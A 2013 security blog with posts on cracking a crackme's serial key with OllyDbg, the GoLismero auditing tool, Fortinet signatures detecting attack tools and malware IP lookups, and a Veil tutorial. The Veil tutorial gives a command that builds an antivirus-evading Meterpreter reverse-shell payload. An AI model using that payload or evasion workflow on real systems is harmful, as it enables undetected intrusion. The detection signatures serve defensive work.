Monday, September 30, 2013


Some months ago, I participated in something like a "Hacker Competition" to get a job in a CERT. One of the tests consisted of getting the serial key of a simple program. The organizer sent me an executable called reversing_test.exe

We are going to work with OllyDbg v1.10. You can download this awesome tool from here: OllyDbg v1.10.



You can see its details in the picture below.



The first thing I usually do in these cases is to check if the executable is compressed or not. Some programs pack some of their codes in order to limit our attempt to statically analyze it. To achieve this purpose we are going to use PeID. In the picture below you can see that the program does not detect any compression "Nothing found *". If the file were compressed with UPX for example, the program would advise us about it and we could uncompress it with this tool.



If we click on the "EP Section" bottom, we will see some executable's details.



We can see the R. Size (Raw Size) "400" and the V.Size (Virtual Size) "350" are similar in ".text" . The .text section contains the instructions that the CPU executes and it should be the only section that includes the code. If some day you detect that the R.Size is "0" and the V.Size is "1000" for example, it would be an indicator that the executable is compressed because in the disk it does not have any size (it is packed) and in the memory it has a size (it is unpacked itself).


Now we have the assurance that the file has not been compressed. This is one of the first steps in a static analysis. We are going to make a dynamic analysis with OllyDbg but I want to know if the developer has made an effort in order to try to hide some code. Notice if the executable is packed then we are not going to be able to read a lot of strings within the file. It is possible I will talk about that in future posts...


The next step would be to run the program by double clicking on the executable. After that, we can see that a MS-DOS window is launched and the program requires us to type the serial number. We type a sentence in order to check the program's behavior.


We have not figured out the serial number... It seems logical...


Now, we are going to run OllyDbg. It does not need installation, just download it and uncompress it. When OllyDbg is opened, just load the executable clicking on File -> Open.



Now we can see the binary code. Don't worry, remember this post is focused on beginners. We are going to click on the play button in order to run the executable just loaded in our debugger and check the file behaviour.



The program has started and we can see the firsts strings like "Press ENTER to finish"...

(Please, click on the picture to see the entire details)


But... Something happens... The program doesn't require us to type the serial number like it occurs when we open the application without using a debugger... It's really strange... It's like the program knows about our intentions and it is closed by itself when we try to run it with a debugger tool...



If we reload the file again on OllyDbg, one line of the code draws our attention... The program is calling to the "IsDebuggerPresent" API.



If we seek this API on Microsoft we can see that "This function allows an application to determine whether or not it is being debugged, so that it can modify its behavior".


Ok, the program is closed when it is open within a debugger. There are many options to avoid being detected by this technique... To achieve this purpose we are going to use the "Hide Debugger 1.2.4" plugin. Just download it and uncompress the DLL in the same OllyDbg's folder.


It is necessary to restart OllyDbg in order to work with this plugin. If you click on Plugins tab you can see Hide Debugger plugin. You don't need to do anything else.



We have just installed the plugin to avoid being detected and now, we are going to load and play the executable again. Now the program requires typing the serial number. Great news...



We are going to type a sentence which will be easily recognizable.



If we come back to OllyDbg we can see our sentence in the Arg1.

(Please, click on the picture to see the entire details)


If we continue looking for this sentence through the code we can locate the code below. We can see the String2="28939387", the String1="I'm going to looking for this sentence in OllyDbg now..." and the API call CompareStringA.

We can figure out that the executable is comparing these strings to each other in order for you to check if both have the same value. We can suppose that the string "28939387" is serial number.

(Please, click on the picture to see the entire details)


OllyDbg offers us to copy the value of this line by left clicking on the line we are interested in.



Then, we are going to paste the line's value to the notepad and then, we are going to copy only the "String2" value: 28939387.



In the end, we just need to try paste the value just copied in our program and... Well!!! We have obtained the serial number of our program!!!



This post could be applied to many of the simple programs which have a keygen integrated but it is needed to have more knowledge if you want to crack more complex programs.

This post is focus on show you some techniques using OllyDbg. It is only a game to get more reversing engineer skills to research malware. Please, don't contact me to crack programs, it is illegal... I recommend you use to use free software!!!! :P


Posted on Monday, September 30, 2013 by Javier Nieto

12 comments

Wednesday, September 18, 2013

GoLismero is an open source framework for web auditing which has been recently presented at AppSec EU de OWAP  en Hamburgo. It has been developed by Daniel Garcia Garcia a.k.a cr0hn (@ggdaniel) and Mario Vilas (@Mario_Vilas).



This tool allows you to map a web application and detect vulnerabilities of it.

Also you can manage a lot of security tools like OpenVas, Nikto, DNS recon, robot analyzer... and take their results merged in a single report automatically.

GoLismero has been tested on Windows, Linux, BSD and OS X and it doesn’t have library dependencies, you only need to have Python 2.7.5 installed.

It's really easy to install. Just execute the command below in your Linux machine.
git clone https://github.com/golismero/golismero.git

Also, this project has created a GoLismero VM (based in Kali Linux). You can download here: http://golismero-project.com/downloads/kali-golismero.ova

This VirtualBox Machine includes:

  • OpenVAS installations pre-configured.
  • VirtualBox tools.
  • GoLismero updater.
  • GoLismero stable and develop version.


We have a lot of options to set in order to run GoLismero. Have a look at the picture below. If you want more information about an option, just type this command.
python golismero.py --help

Like the one mentioned above, GoLismero can manage some well known applications like Nikto. With the command below, we can see all the plugins available to use.
python golismero.py --plugin-list

Here, I'm going to describe all plugins included with this tool.

-= Import plugins =-
  • csv:  Import the results of a Nikto scan in CSV format.
  • xml:  Import the results of an OpenVAS scan.

-= Recon plugins =-
  • default_error_page:  Identifies default error pages for most commonly used web servers.
  • dns_analyzer:  Tries to find hidden subdomains by enumerating them using the DNS protocol.
  • dns_subdomains_bruteforcer:  Tries to find hidden subdomains by brute force.
  • dns_zone_transfer:  Tries to make a DNS zone transfer.
  • fingerprint_os:  Fingerprinter of server operating systems.
  • fingerprint_web:  Fingerprinter of web servers.
  • robots:  Analyzes robots.txt files and extracts their links.
  • spider:  Web spider plugin. Without it, GoLismero can't crawl web sites.
  • suspicious_url:  Flags suspicious words in URLs.
  • theharvester:  Integration with theHarvester (https://code.google.com/p/theharvester/).

-= Scan plugins =-
  • brute_directories:  Tries to discover hidden folders by brute force:  www.site.com/folder/ -> www.site.com/folder2 www.site.com/folder3 ...
  • brute_extensions:  Tries to discover hidden files by brute force:  www.site.com/index.php -> www.site.com/index.php.old
  • brute_permutations:  Tries to discover hidden files by bruteforcing the extension:  www.site.com/index.php -> www.site.com/index.php2
  • brute_predictables:  Tries to discover hidden files at predictable locations. For example: (Apache) www.site.com/error_log
  • brute_prefixes:  Tries to discover hidden files by bruteforcing prefixes:  www.site.com/index.php -> www.site.com/~index.php
  • brute_suffixes:  Tries to discover hidden files by bruteforcing suffixes:  www.site.com/index.php -> www.site.com/index2.php
  • nikto:  Run the Nikto scanner and import the results.
  • openvas:  Run the OpenVAS scanner and import the results

-= Report plugins =-
  • html:  Plugin to generate HTML reports.
  • text:  Creates text reports in files or on screen.

-= UI plugins =-
  • console:  Console user interface.
  • disabled:  Empty user interface.

Also you can create your own plugins. You can obtain more information about its plugin's API here.

If you want to know more details about some plugins you can get it typing --plugin-info plugin_name. Have a look at the commands and pictures below:
python golismero.py --plugin-info openvas
If you would like to integrate GoLismero with OpenVAS you should set the correct IP, port, user and password of your OpenVAS installation.

python golismero.py --plugin-info nikto

After this brief introduction of the GoLismero's details, I want to show you an example of how to work with this tool.

First of all,  take care with this tool. If you launch it with the default options, the tool begins to search other subdomains and try to attack them. You might want to audit all your infraestructure and if it's your goal, that is ok, if not, use the "--forbid-subdomains" option.

Ok. Let's go.
sudo python golismero.py -d theharvester,openvas,dns* --forbid-subdomains --audit-name MyProject -o MyProject.html www.example.es

Details about this command:

  • With "-d" option, we are telling to GoLismero that we don't want to use theharvester, openvas and the rest of plugins which begin with "dns".
  • With "--forbid-subdomains" we avoid attacking other subdomains. We are going to focus in only one target.
  • With "--audit-name MyProject" we are going to save the results in a database named MyProject.db.
  • With "-o MyProject.html" we are going to generate a HTML report.

Note: If you want to set which plugins you want use instead of which plugins you don't want to use, you can use "-e" option.

 

Then, you only need to wait until the scan is finished. Depending on the website you are auditing or the command you have typed, you need to wait more or less time. Be warned, getting the report can take some time, so, I recommend launching the scans, then doing something else like having a relaxing cup of coffee while the scan is working ... ;)

When the scan is finished, just open the HTML report with your favourite web browser.


We can see the details of the report filtered by Vulnerability...



... or filtered by resource.


The picture below shows us a vulnerability found on the web site we have just audited.



In my opinion GoLismero is a great tool which is currently growing.

The next features of GoLismero will be:
  • Integration with Nmap, SQLMap, Metasploit and many other tools.
  • Web UI.
  • Export results in PDF format.


Posted on Wednesday, September 18, 2013 by Javier Nieto

No comments

Monday, September 09, 2013

In the last post, we talked about how to create some custom Application Control signatures with Fortinet Fortigate firewalls in order to detect a specific behavior to look for possible infected hosts inside our networks.

In this post, I will show you how to detect some tools which could be used to attack our infrastructure by creating custom IPS signatures. We will give three examples and then, you will be capable of creating your own signatures to detect similar tools.

Sqlmap

Sqlmap is "an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database server". Of course, the best way to avoid attackers from getting access to our databases is to develop securely, checking our security by performing regular pentesting projects and using a Web Application Firewall... But we always want to know when we are under attack and to be protected just in case we did a mistake in our security planning.

We are going to create a custom IPS signature to detect Sqlmap by looking at the User-Agent string. Some of these tools have the option of changing the User-Agent in order to try to keep a little bit more unnoticed.  Even knowing that Sqlmap has this option, it worths some of our time to detect attackers that don´t change the default User-Agent of their tools. There are a lot of them out there...

This is the default Sqlmap User-Agent (it depends on the installed version).

  • User-Agent: sqlmap/1.0-dev-nongit-20141210 (http://sqlmap.org)


We just need to add a pattern like that to detect the User-Agent used by Sqlmap.

  • --pattern \"User-Agent|3a 20|sqlmap\"

With this pattern we will match "User-Agent: sqlmapXXXXXXXXXXXXXXX"

Noticed that the characters bellow must be written as:

  • " ->|22|
  • ; -> |3B| or |3b|
  • \ -> |5C| or |5c|
  • | -> |7C| or |7c|
  • : -> |3A| or |3a|
  • space -> |20|

So ":" corresponds to |3a| and " " (space) corresponds to |20| so it should be |3a 20|


You can create the custom signature via CLI with the commands bellow.

config ips custom
    edit "Sqlmap.Web.Vulnerability.Scanner"
        set signature "F-SBID( --name \"Sqlmap.Web.Vulnerability.Scanner\"; --protocol tcp; --service HTTP;  --parsed_type HTTP_GET; --flow from_client; --pattern \"User-Agent|3a 20|sqlmap\"; --context header; )"
        set comment ''
    next
end

Nikto

Nikto "is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software."

Nikto has an User-Agent like that (it depends on the version):

  • User-Agent: Mozilla/4.75 (Nikto/2.1.4) (Evasions:None) (Test:Port Check)

As we did in our last post, we will use regular expression in order to try to detect all possible Nikto User-Agents used by diferent versions.

  • --pcre /User-Agent: Mozilla.[0-9]{1}.[0-9]{2}..Nikto/

The final rule is:

config ips custom
    edit "Nikto.Web.Vulnerability.Scanner"
        set signature "F-SBID( --name \"Nikto.Web.Vulnerability.Scanner\"; --protocol tcp; --service HTTP; --parsed_type HTTP_GET; --flow from_client; --pcre /User-Agent: Mozilla.[0-9]{1}.[0-9]{2}..Nikto/; --context header; )"
        set comment ''
    next
end

Skipfish

Skipfish "is an active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes. The resulting map is then annotated with the output from a number of active (but hopefully non-disruptive) security checks."

As the previous ones, depending on the installed version, Skipfish has a different User-Agent. Here some examples.

  • User-Agent: "Mozilla/5.0 SF/1.01b"
  • User-Agent: "Mozilla/5.0 SF/2.10b"

By using pcre we will try to detect again all possible versions:

  • --pcre /User-Agent: Mozilla.[0-9]{1}.[0-9]{1}.SF.[0-9]{1}.[0-9]{2}[A-Za-z_]/

config ips custom
    edit "Skipfish.Web.Vulnerability.Scanner"
        set signature "F-SBID( --name \"Skipfish.Web.Vulnerability.Scanner\"; --protocol tcp; --service HTTP; --parsed_type HTTP_GET; --flow from_client; --pcre /User-Agent: Mozilla.[0-9]{1}.[0-9]{1}.SF.[0-9]{1}.[0-9]{2}[A-Za-z_]/; --context header; )"
        set comment ''
    next
end

Testing

We just need to add our custom IPS signatures to our IPS profile and set them to "Block". Then we will see how our IPS is dropping the sessions generated by those tools when they are used against our web servers.






Posted on Monday, September 09, 2013 by Javier Nieto

No comments

Monday, September 02, 2013

Veil is a awesome tool developed by Chris Truncer @ChrisTruncer, Mike Wright @TheMightyShiv and The Grayhound @the_grayhound specifically designed for Kali Linux which has the goal of:

  • Bypass common AV solutions used.
  • Get the payloads from Metasploit framework, and get the new ones in the future Metasploit releases.
  • Try to create each payload as random as possible.

Some days ago Veil v2.0.4 was Released. I'm want to talk about it and give some examples about how to bypass severals anti-virus.

The main changes in this version is:

  • x64 compatibility – They have updated their setup script in order to make Veil compatible with both x86 and x64 versions.
  • Update Feature – Now Veil has an update function. Now we can update Veil either the command line or menu.

There are tutorials available at http://www.veil-evasion.com The framework can be downloaded from Chris' github at https://github.com/ChrisTruncer/Veil/ or at https://github.com/ChrisTruncer/Veil/archive/master.zip.

If you want to install Veil in your own environment you can use the commands below:
wget https://github.com/ChrisTruncer/Veil/archive/master.zip
unzip master.zip
cd Veil-master/setup
cd ..
./setup.sh 

If you want to work with Kali Linux, with the commands below it will be enough.
apt-get update
apt-get install veil 

I had a  bad experience with the second option and I prefer to install Veil with the first one using "setup.sh" script.

The veil's developers don't want to submit any payload to www.virustotal.com to avoid distribution to the anti-virus vendors. There are an alternative: vscan.novirusthanks.org. That site scan the suspicious files for malware detection and offer us the option below: "Do not distribute the sample".

When Veil is recently installed, just run it with the command below:
./Veil

By default in Kali Linux, we can see 18 payloads ready to be used. Now we can type "use".



Here, Veil offers us more information about the payloads. In this case I chose python/b64VirtualAlloc typing "18"



When our payload is loaded type "generate". You can set some specifics options, but in this post, we are going to try the default options.



Now we are going to select msfvenom typing "1"



After that we need to type some details:

  • Enter metasploit payload: "windows/meterpreter/reverse_tcp"
  • Enter value for 'LHOST', [tab] for local IP: "192.168.69.69"
  • Enter value for 'LPORT': "443"

Then it's necessary to wait while the shellcode is been generated.



You need to press enter and then Veil requests us the name of our payload. In this case "undetectable"



We are going to use Pyinstaller. It will create a .exe installable. For this, we are going to type "1"



In the end, we can get our executable at "/root/Veil-master/output/compiled/"



Now, we have our executable and we are going to submit it to vscan.novirusthanks.org. Please, remember to check "Do not distribute the sample". If you choose to don't check this options or you decide to submit the executable to www.virustotal.com your file will be investigated and maybe it will be recognized by some anti-virus vendors.


You can see in the picture below any of the anti-virus vendors have detected our file as malicious. We have got a rate detection of 0%!!!!



If you prefer to use the CLI instead of a menu, you can generate the same payload we have just created with the command below.

./Veil.py -l python -p b64VirtualAlloc -o undetectable --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=192.168.69.69 LPORT=443


Posted on Monday, September 02, 2013 by Javier Nieto

6 comments

Sunday, September 01, 2013

In this blog post I would like to share some tricks to detect suspicious activities that could end with finding compromised hosts inside a network. I´ve noticed (I guess you too) that there are some malware out there and the first things they do, when a computer is infected, is to check the public IP address in order to let the malware developer know, where the infected host is located. We can see this behavior in a lot of malware like Cryptowall 2.0KriptovoZeroAccess and many more...

I use to work with Suricata as IDS (by the way, really happy with its performance) and Emerging Threats rules in order to detect computers trying to get its public IP address. You know... it´s weird that someone from the Human Resources department is interested in getting their computer´s public IP address...

You can find some free Suricata signatures here that are focused on that task. You can filter by "IP Check" or "External IP Lookup".

If you are using Suricata or Snort as IDS, they are good for starting an investigation when these alerts are triggered but I would like to go a little bit further without allowing the malware to get the public IP address, just to make things more difficult for the malware developer...

I´m not using Suricata as IPS but I do have an IPS and an Application Control with a Fortinet Fortigate firewall. There are many ways to achieve this goal, but this time I think my best bet is Fortinet App Control. Also, a NGFW allows us to perform a man in the middle "attack" and see what´s going on inside a SSL tunnel which makes our signatures more effective, just in case the connection goes to a SSL service...

Creating a custom App Control signature with Fortinet

I've decided to create custom signatures to detect if someone or something is trying to get the public IP address. I would like to share  three options that you could work with.

It is not a big deal to create custom signatures with Fortinet App Control to detect these connections, so for me, it worth some of my time to deal with them not only to detect them but drop them.

Example 1 - Easy mode

If we get access to checkip.dyndns.org we can see that the public IP address is returned.


If we look at the pcap capture we can see (obviously) that the host reached is checkip.dyndns.org. We can see the domain in the Host line in the HTTP header, so here is where we will look and it will be defined thanks to the signature Context.


If we want to detect if someone is getting access to checkip.dyndns.org we just need to create the rule bellow via CLI.

config application custom
    edit "External.IP.Lookup.-checkip.dyndns.org-.Custom"
        set comment ''
        set signature "F-SBID( --attack_id 4467; --name \"External.IP.Lookup.-checkip.dyndns.org-.Custom\"; --app_cat 25; --protocol tcp; --service HTTP; --parsed_type HTTP_GET; --flow from_client; --pattern \"checkip.dyndns.org\"; --context host; --no_case; )"
        set category 25
    next
end

You can find more APP controls example of rules in my Github account.

This rule doesn´t have a lot to explain, it´s really easy and "similar" to Snort/Suricata rules. This is a brief description of our rule:

  • -- attack_id 4467; if you don´t specify an attack_id, it will automatically assigned
  • --name; signature name
  • --app_cat 25; correspond to Web.Ohters category
  • --pattern; the string we are going to look for in the packet traffic
  • --parsed_type HTTP_GET; is the HTTP method used to retrieve the public IP address
  • --flow from_client; Match packets sent from the client to the server
  • --no_case; by default, patterns are case sensitive so --no_case makes the pattern matching case insensitive
  • --context host; context to match the pattern. There are several ones: HOST, URI, HEADER, BODY, BANNER...

Once the rules are created, you just need to add them to your AppControl sensor and set the Action.


When the changes are applied and we try to get access to checkip.dyndns.org again, the connection will be blocked and we will get that message: "Application Blocked". That is because "Replacement Messages for HTTP-based Applications" is checked.



If you don´t want to inform the users/malware you just need to unset "Replacement Messages for HTTP-based Applications"
















and there will not be any messages, the session will be just dropped.


Example 2 - Medium mode

Sometimes we need to specify not just the hostname we want to monitor/block but we also need to specify the HTTP URI. Imagine we need to block "ip-api.com/xml" but we want to let our users still to get access to "ip-api.com".

We will need to check two condition:
  1. Host: ip-api.com
  2. URI: xml
So we will need to set two patterns and two context:
  1. --pattern \"ip-api.com\"; --context host;
  2. --pattern \"xml\"; --context uri;
This is the rule we need to configure.

config application custom
    edit "External.IP.Lookup.-ip-api-.Custom"
        set comment ''
        set signature "F-SBID( --attack_id 5188; --name \"External.IP.Lookup.-ip-api-.Custom\"; --app_cat 25; --protocol tcp; --service HTTP; --parsed_type HTTP_GET; --flow from_client; --pattern \"ip-api.com\"; --context host; --no_case; --pattern \"xml\"; --context uri; --no_case; )"
        set category 25
    next
end

Example 3 - Paranoid mode

As you have noticed, if the malware retrieves the public IP address from a domain which has not been included in our signatures, we will not be aware of it and the session will not be monitored/dropped.

There is a possible solution. When the malware requests the public IP address from a web server, it responds with the IP address in the HTTP body.



What we can do is to look at the responses looking for our public IP addresses. Of course, we usually have more than one, in my case, a complete class B network. In order to check if our class B network (88.11.0.0/16) is included in the server response, we will use PCRE.

To achieve our goal, we need to set the following parameters:
  1. --flow from_server; Match packets sent from the server to the client
  2. --pcre /88.11.[0-9]{1,3}.[0-9]{1,3}/; That regular expression matches from 88.11.0.0 to 88.11.999.999
  3. --context body; we will look at the server response in the HTTP body
So that is the rule.

config application custom
    edit "External.IP.Lookup.Detected.Custom"
        set comment ''
        set signature "F-SBID( --name \"External.IP.Lookup.Detected.Custom\"; --app_cat 25; --protocol tcp; --service HTTP; --parsed_type HTTP_GET; --flow from_server; --pcre /88.11.[0-9]{1,3}.[0-9]{1,3}/; --context body; )"
        set category 25
    next

*** Think about possible false positives before setting this rule to Block. You should monitor before blocking because some web pages like glassdoor.com, returns your public IP address in the commented source code...

References

http://video.fortinet.com/uploads/documents/IPS%20Signature%20Syntax%20Guide.pdf



Posted on Sunday, September 01, 2013 by Javier Nieto

No comments